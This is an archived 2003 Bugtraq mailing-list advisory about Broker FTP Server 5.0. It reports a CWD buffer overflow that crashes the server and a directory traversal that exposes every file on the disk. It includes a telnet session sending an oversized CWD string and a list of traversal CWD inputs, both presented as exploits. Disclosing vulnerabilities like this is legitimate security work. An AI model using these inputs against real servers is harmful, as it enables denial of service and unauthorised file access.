lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20030330193230.28754.qmail@www.securityfocus.com>
Date: 30 Mar 2003 19:32:30 -0000
From: subj <r2subj3ct@...lan.org>
To: bugtraq@...urityfocus.com
Subject: Buffer Overflow in Broker FTP Server




Product : Broker FTP Server
Version : 5.0
OSystem : Windows
Authors : TransSoft
WebSite : http://www.ftp-broker.com
Problem : 
        * Buffer Overflow in field CWD
        * Access to all files on a disk

#[Denial of Service]#

Description:
------------

eng:
====
To arrange overflow in field CWD, necessary to send on it more than 256 
bytes of dust.
After that server will fall, and will not submit any life attributes.

Exploit:
--------
*************************************
>>Telnet 127.0.0.1:21
220 FTP Server Ready [***]
>>USER anonymous
331 Password required for anonymous.
>>PASS anonymous@...alhost
230-Welcome to Broker FTP Server.
230-
230 User anonymous logged in.
CWD AAAAAAAAAAA......AAAAA [256b]
*************************************


#[Access to all files on a disk]#

Description:
------------

rus:
====
&#1047;&#1072; &#1089;&#1095;&#1077;&#1090; &#1101;&#1090;&#1086;&#1081; &#1091;&#1103;&#1079;&#1074;&#1080;&#1084;&#1086;&#1089;&#1090;&#1080; &#1074;&#1099; &#1084;&#1086;&#1078;&#1077;&#1090;&#1077; &#1087;&#1086;&#1083;&#1091;&#1095;&#1080;&#1090;&#1100; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087; &#1082;&#1086; &#1074;&#1089;&#1077;&#1084; &#1092;&#1072;&#1081;&#1083;&#1072;&#1084; &#1085;&#1072; 
&#1078;&#1077;&#1089;&#1090;&#1082;&#1086;&#1084; &#1076;&#1080;&#1089;&#1082;&#1077; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;
eng:
====
Due to this vulnerability you can get access to all files on a hard drive 
of the server
Exploits:

    Current Directory : "/"
CWD *
CWD /*
CWD /..
CWD /...
CWD /.../

Contacts:
---------

r2subj3ct@...lan.org
subj.24h.to (www.dwcgr0up.com/subj/)
www.dwcgr0up.com
irc.dwcgr0up.biz #dwc

Thanks:
-------
 DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies
 DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ